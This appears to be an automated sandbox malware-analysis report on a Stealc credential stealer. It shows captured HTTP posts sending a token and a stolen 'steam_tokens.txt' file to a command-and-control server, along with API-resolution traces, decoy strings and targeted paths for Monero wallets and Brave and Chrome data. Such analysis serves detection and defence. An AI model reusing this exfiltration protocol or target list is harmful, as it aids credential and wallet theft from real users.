Oct 24, 2024 19:29:22.858640909 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBA Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="file"------FCFBFHIEBKJKFHIEBFBA--
Oct 24, 2024 19:29:23.640587091 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:22 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 19:29:23.674396038 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFHCGCGDAAKFIECFHDB Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 2d 2d 0d 0a Data Ascii: ------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="message"ybncbhylepme------DBFHCGCGDAAKFIECFHDB--
Oct 24, 2024 19:29:23.969496012 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:23 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2398 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Oct 24, 2024 19:29:23.971143007 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDA Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JEGHDAFIDGDAAKEBFHDA--
Oct 24, 2024 19:29:24.753976107 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	13:29:01
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x360000
File size:	1'852'928 bytes
MD5 hash:	FE2148029209699E0EE2CBA27C4D5F8B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1723190481.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	24.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 00379860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01142230), ref: 003798A1
GetProcAddress.KERNEL32(74DD0000,01142428), ref: 003798BA
GetProcAddress.KERNEL32(74DD0000,011422D8), ref: 003798D2
GetProcAddress.KERNEL32(74DD0000,01142278), ref: 003798EA
GetProcAddress.KERNEL32(74DD0000,01142248), ref: 00379903
GetProcAddress.KERNEL32(74DD0000,01149048), ref: 0037991B
GetProcAddress.KERNEL32(74DD0000,01135790), ref: 00379933
GetProcAddress.KERNEL32(74DD0000,01135870), ref: 0037994C
GetProcAddress.KERNEL32(74DD0000,011422F0), ref: 00379964
GetProcAddress.KERNEL32(74DD0000,01142488), ref: 0037997C
GetProcAddress.KERNEL32(74DD0000,01142368), ref: 00379995
GetProcAddress.KERNEL32(74DD0000,01142380), ref: 003799AD
GetProcAddress.KERNEL32(74DD0000,01135910), ref: 003799C5
GetProcAddress.KERNEL32(74DD0000,01142398), ref: 003799DE
GetProcAddress.KERNEL32(74DD0000,01142260), ref: 003799F6
GetProcAddress.KERNEL32(74DD0000,01135830), ref: 00379A0E
GetProcAddress.KERNEL32(74DD0000,01142440), ref: 00379A27
GetProcAddress.KERNEL32(74DD0000,011423C8), ref: 00379A3F
GetProcAddress.KERNEL32(74DD0000,01135930), ref: 00379A57
GetProcAddress.KERNEL32(74DD0000,01142470), ref: 00379A70
GetProcAddress.KERNEL32(74DD0000,011357B0), ref: 00379A88
LoadLibraryA.KERNEL32(01142518,?,00376A00), ref: 00379A9A
LoadLibraryA.KERNEL32(011425C0,?,00376A00), ref: 00379AAB
LoadLibraryA.KERNEL32(01142590,?,00376A00), ref: 00379ABD
LoadLibraryA.KERNEL32(011425A8,?,00376A00), ref: 00379ACF
LoadLibraryA.KERNEL32(01142548,?,00376A00), ref: 00379AE0
GetProcAddress.KERNEL32(75A70000,01142560), ref: 00379B02
GetProcAddress.KERNEL32(75290000,01142578), ref: 00379B23
GetProcAddress.KERNEL32(75290000,011425D8), ref: 00379B3B
GetProcAddress.KERNEL32(75BD0000,01142530), ref: 00379B5D
GetProcAddress.KERNEL32(75450000,01135990), ref: 00379B7E
GetProcAddress.KERNEL32(76E90000,01148F68), ref: 00379B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00379BB6

Strings

NtQueryInformationProcess, xrefs: 00379BAA

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: da615fe2a7a2975f0951f896d78a737331d78d878e85279ff77baea61b51e36b
Instruction ID: bff4ab0bc6e965a7e0353aee1fa3481d17a9fd25faf016cf1d635c292d09e5cd
Opcode Fuzzy Hash: da615fe2a7a2975f0951f896d78a737331d78d878e85279ff77baea61b51e36b
Instruction Fuzzy Hash: 5AA1A1B55002519FC399DFA8FD88A6A37F9F76E301704851AE605C3225D73D984AFF22

Function 003645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0036460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0036479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003645F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003645DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003645E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003645D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003645C7

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 7c80c32ff3cb6e378a56fecd0993345a24098f1ebe2d46142c7d8f9b4a86339d
Instruction ID: d370d2e179d8b924a3bae28dcee09d6ee83f9f547452b64963cff922280b2c1f
Opcode Fuzzy Hash: 7c80c32ff3cb6e378a56fecd0993345a24098f1ebe2d46142c7d8f9b4a86339d
Instruction Fuzzy Hash: 8341F1606C67246BE62AFBAC99C2EDD77665F43BC8F5070C4E802522CACBF06500C727

Function 0036BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

FindFirstFileA.KERNEL32(00000000,?,00380B32,00380B2B,00000000,?,?,?,003813F4,00380B2A), ref: 0036BEF5
StrCmpCA.SHLWAPI(?,003813F8), ref: 0036BF4D
StrCmpCA.SHLWAPI(?,003813FC), ref: 0036BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0036C7BF
FindClose.KERNEL32(000000FF), ref: 0036C7D1

Strings

\Brave\Preferences, xrefs: 0036C1DB
Brave, xrefs: 0036C102
Google Chrome, xrefs: 0036C634
